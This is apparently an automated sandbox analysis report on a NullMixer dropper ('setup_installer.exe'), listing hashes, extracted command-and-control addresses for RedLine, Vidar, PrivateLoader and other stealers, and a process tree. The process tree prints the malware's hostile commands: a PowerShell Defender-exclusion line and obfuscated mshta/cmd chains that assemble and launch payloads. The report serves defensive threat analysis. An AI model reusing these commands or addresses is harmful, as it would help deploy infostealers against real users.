Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-11-2024 04:30

General

  • Target

    setup_installer.exe

  • Size

    5.9MB

  • MD5

    2054a395da9f7a789bef703c5d2d60c1

  • SHA1

    f170cbc93d4fb3f4f92ccd88039272bf78bdfa89

  • SHA256

    1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433

  • SHA512

    1439382b36a24d898fc769a742b05c2c9ad898a6e5750e0f7e813fd5d536834e44572061efb0c89af72c5a97c3502e9ee30c2c861154f0fbb4c4164e3880ffcf

  • SSDEEP

    98304:xHCvLUBsghjeXIZ90vNP7S5OFFh506+n5+4fKwKy7mGVYQUki4mG:xkLUCghZ90e5+50T7fKwV7mGaQBmG

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

privateloader

C2

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

Extracted

Family

nullmixer

C2

http://hsiens.xyz/

Extracted

Family

redline

Botnet

ANI

C2

194.104.136.5:46013

Attributes
  • auth_value

    9491a1c5e11eb6097e68a4fa8627fda8

Extracted

Family

redline

Botnet

media17

C2

91.121.67.60:2151

Attributes
  • auth_value

    e37d5065561884bb54c8ed1baa6de446

Extracted

Family

gcleaner

C2

ppp-gl.biz

45.9.20.13

Extracted

Family

vidar

Version

41.4

Botnet

916

C2

https://mas.to/@sslam

Attributes
  • profile_id

    916

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Fabookie family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

  • Nullmixer family
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Onlylogger family
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Privateloader family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 10 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 10 IoCs
  • Sectoprat family
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars family
  • Socelars payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • OnlyLogger payload 1 IoCs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2856
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2832
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1144
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon003b11682c.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:828
        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon003b11682c.exe
          Mon003b11682c.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:2680
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon003b11682c.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon003b11682c.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:300
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon00ef1e53f6f539435.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2612
        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00ef1e53f6f539435.exe
          Mon00ef1e53f6f539435.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1672
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 1348
            5⤵
            • Program crash
            PID:1508
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon00e469051c4c7a.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2624
        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00e469051c4c7a.exe
          Mon00e469051c4c7a.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1860
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VbSCript: CLOse ( CReatEoBJeCT ( "wscriPT.sheLL" ). run ( "CMd.exe /C TYpE ""C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00e469051c4c7a.exe"" > ESYZ4xAO6IJ.eXE && sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if """"== """" for %t iN (""C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00e469051c4c7a.exe"" ) do taskkill /f -im ""%~NXt"" ",0, True))
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2304
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C TYpE "C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00e469051c4c7a.exe" > ESYZ4xAO6IJ.eXE &&sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if ""== "" for %t iN ("C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00e469051c4c7a.exe" ) do taskkill /f -im "%~NXt"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2924
              • C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE
                ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2468
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VbSCript: CLOse ( CReatEoBJeCT ( "wscriPT.sheLL" ). run ( "CMd.exe /C TYpE ""C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE"" > ESYZ4xAO6IJ.eXE && sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if ""/PdBPpkdCKFRGSs8QEyyO_B7~gkV ""== """" for %t iN (""C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE"" ) do taskkill /f -im ""%~NXt"" ",0, True))
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1844
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C TYpE "C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE" > ESYZ4xAO6IJ.eXE &&sTart ESYz4xAO6iJ.EXe /PdBPpkdCKFRGSs8QEyyO_B7~gkV & if "/PdBPpkdCKFRGSs8QEyyO_B7~gkV "== "" for %t iN ("C:\Users\Admin\AppData\Local\Temp\ESYZ4xAO6IJ.eXE" ) do taskkill /f -im "%~NXt"
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:880
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VBscRipt: close ( CREateobJect ("wSCrIPt.SHELL" ). rUN ( "CMd /q /C Echo | set /P = ""MZ"" > www1PR~.BG & cOpy /y /B www1pr~.BG + xZ62y.ZZY + NOSJk.fU + mY33o.U faJSZJuU.PB& staRT msiexec -Y .\fAJszjUU.PB & dEL XZ62y.zZy NOSJk.fU MY33O.U WWW1pr~.Bg " , 0 ,truE ) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1596
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /q /C Echo | set /P = "MZ" > www1PR~.BG & cOpy /y /B www1pr~.BG + xZ62y.ZZY + NOSJk.fU + mY33o.U faJSZJuU.PB& staRT msiexec -Y .\fAJszjUU.PB & dEL XZ62y.zZy NOSJk.fU MY33O.U WWW1pr~.Bg
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:2880
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" Echo "
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2184
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>www1PR~.BG"
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2964
                    • C:\Windows\SysWOW64\msiexec.exe
                      msiexec -Y .\fAJszjUU.PB
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2696
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f -im "Mon00e469051c4c7a.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1316
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon00ffeff6b2.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2660
        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00ffeff6b2.exe
          Mon00ffeff6b2.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1724
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon00536518ad16.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1944
        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00536518ad16.exe
          Mon00536518ad16.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2292
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00536518ad16.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00536518ad16.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
            5⤵
            • System Location Discovery: System Language Discovery
            PID:840
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00536518ad16.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00536518ad16.exe" ) do taskkill /F -Im "%~NxU"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2268
              • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                09xU.EXE -pPtzyIkqLZoCarb5ew
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1504
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:2284
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:2352
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2652
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:2632
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2164
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2344
                    • C:\Windows\SysWOW64\control.exe
                      control .\R6f7sE.I
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:1856
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:2956
                        • C:\Windows\system32\RunDll32.exe
                          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                          12⤵
                            PID:668
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                              13⤵
                              • Blocklisted process makes network request
                              • System Location Discovery: System Language Discovery
                              PID:2140
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F -Im "Mon00536518ad16.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00df41776583.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2296
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00df41776583.exe
            Mon00df41776583.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1272
            • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00df41776583.exe
              C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00df41776583.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00d0d86f7f1e6.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2112
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00d0d86f7f1e6.exe
            Mon00d0d86f7f1e6.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00946c5090.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1512
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00946c5090.exe
            Mon00946c5090.exe
            4⤵
            • Executes dropped EXE
            PID:2596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00f8ffa77fe72688.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1808
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00f8ffa77fe72688.exe
            Mon00f8ffa77fe72688.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1660
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im chrome.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2216
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im chrome.exe
                6⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2476
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00806cfb48.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1756
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00806cfb48.exe
            Mon00806cfb48.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2040
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 272
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:1668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00b1dca232.exe /mixone
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1472
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00b1dca232.exe
            Mon00b1dca232.exe /mixone
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00ea631982.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2940
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00ea631982.exe
            Mon00ea631982.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon001dcfc58b0850.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2912
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon001dcfc58b0850.exe
            Mon001dcfc58b0850.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2704
            • C:\Users\Admin\AppData\Local\Temp\is-OQHV8.tmp\Mon001dcfc58b0850.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-OQHV8.tmp\Mon001dcfc58b0850.tmp" /SL5="$601D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon001dcfc58b0850.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:408
              • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon001dcfc58b0850.exe
                "C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon001dcfc58b0850.exe" /SILENT
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1352
                • C:\Users\Admin\AppData\Local\Temp\is-LMKEP.tmp\Mon001dcfc58b0850.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-LMKEP.tmp\Mon001dcfc58b0850.tmp" /SL5="$8022A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon001dcfc58b0850.exe" /SILENT
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:1432
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon0086072e872c.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1996
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon0086072e872c.exe
            Mon0086072e872c.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2192
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon0052c87b01411369.exe
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2708
          • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon0052c87b01411369.exe
            Mon0052c87b01411369.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1728
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 480
          3⤵
          • Program crash
          PID:2776
    • C:\Windows\system32\conhost.exe
      \??\C:\Windows\system32\conhost.exe "164407643318569234131162149719-1446162373-1710612148-196753650536561436-1999821333"
      1⤵
        PID:880
      • C:\Windows\system32\DllHost.exe
        C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
        1⤵
          PID:2776

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon001dcfc58b0850.exe

          Filesize

          379KB

          MD5

          7c20266d1026a771cc3748fe31262057

          SHA1

          fc83150d1f81bfb2ff3c3d004ca864d53004fd27

          SHA256

          4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46

          SHA512

          e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon0052c87b01411369.exe

          Filesize

          402KB

          MD5

          06ee576f9fdc477c6a91f27e56339792

          SHA1

          4302b67c8546d128f3e0ab830df53652f36f4bb0

          SHA256

          035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8

          SHA512

          e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00536518ad16.exe

          Filesize

          1.2MB

          MD5

          7c6b2dc2c253c2a6a3708605737aa9ae

          SHA1

          cf4284f29f740b4925fb2902f7c3f234a5744718

          SHA256

          b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

          SHA512

          19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon0086072e872c.exe

          Filesize

          96KB

          MD5

          91e3bed725a8399d72b182e5e8132524

          SHA1

          0f69cbbd268bae2a7aa2376dfce67afc5280f844

          SHA256

          18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d

          SHA512

          280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00946c5090.exe

          Filesize

          1.3MB

          MD5

          8aaec68031b771b85d39f2a00030a906

          SHA1

          7510acf95f3f5e1115a8a29142e4bdca364f971f

          SHA256

          dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b

          SHA512

          4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00b1dca232.exe

          Filesize

          442KB

          MD5

          2de8d046d57fa60509800b164868a881

          SHA1

          905be498f9490445da60c9ee457de1e8411ce074

          SHA256

          02883fa63667972547fe36023646554c3d2895b41c5a8683ab5b2292f5d2d464

          SHA512

          addb7b321517a94e1c4da2835178063a739ec01fa6d2e23b8221a50b6d6371b298e5f25a4bbc13d7e3990ab6116f50907e8d7409ee123824c6579fe5f6597735

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00d0d86f7f1e6.exe

          Filesize

          8KB

          MD5

          57d5ff3df107c648b937d9a9f2b2913a

          SHA1

          976981fdecd8a4eba69470e48515e1dfb8183d19

          SHA256

          a35c57c48ea797dc9f1a891aed4b2cef9f4bbacbf24fe317164dbaa02c43bcb8

          SHA512

          e74e3772dd494a71f9073c6057ff7e9f7e1e7af4dcfb30832ca32f998ae1a3351f4adb9f774ac617bf55f73aba8e39d5777b500fcf7dcab6f70d58e899cce3e4

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00e469051c4c7a.exe

          Filesize

          1.5MB

          MD5

          e2f65b4d95e309cc35900bfd4125e0b6

          SHA1

          debd78147fc93aeb04e55b01ac31badad52a4d8e

          SHA256

          51fc72953df863f42e300f2a4c3466a86e6e97f066f3bcabf9a342647eb096f3

          SHA512

          dd5ee48afb249e78aaa63d992488c4f663ba6bd2b2252f85e6d133db0d700d72efbe3ddfe88d4e14dfc2d53a40ce8326d8a8c9c5941999be9393bfbe92a0dbe0

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00ea631982.exe

          Filesize

          402KB

          MD5

          d08cc10c7c00e13dfb01513f7f817f87

          SHA1

          f3adddd06b5d5b3f7d61e2b72860de09b410f571

          SHA256

          0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d

          SHA512

          0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00ef1e53f6f539435.exe

          Filesize

          775KB

          MD5

          0d3a4198164c04b532d466c8ccc230e7

          SHA1

          cfdb6ce04212f543f8e2bf8cd784e3c635e9a289

          SHA256

          900033e11a0853c12ec6135e9050e776f39b0bab77b7824aa98bef4db361a2f2

          SHA512

          d24655112faa883b506800a7b84f23b7446073c37e7d2f67289ec4fff0d54cba6aac7bfde8879dac6d3fa18b82cf96db1b2a2f8155e2b2a1e5c2ba9829004133

        • C:\Users\Admin\AppData\Local\Temp\7zS4565B3A6\Mon00ffeff6b2.exe

          Filesize

          69KB

          MD5

          451dff36acd7410c285b73baf5946183

          SHA1

          9f558e45a492185c7ed7ebfffe9cbcffc69383de

          SHA256

          c0edb14c6a8417fe1eb17829d2838e9fad1b3cc3e748d585029f4a9c1c3c1551

          SHA512

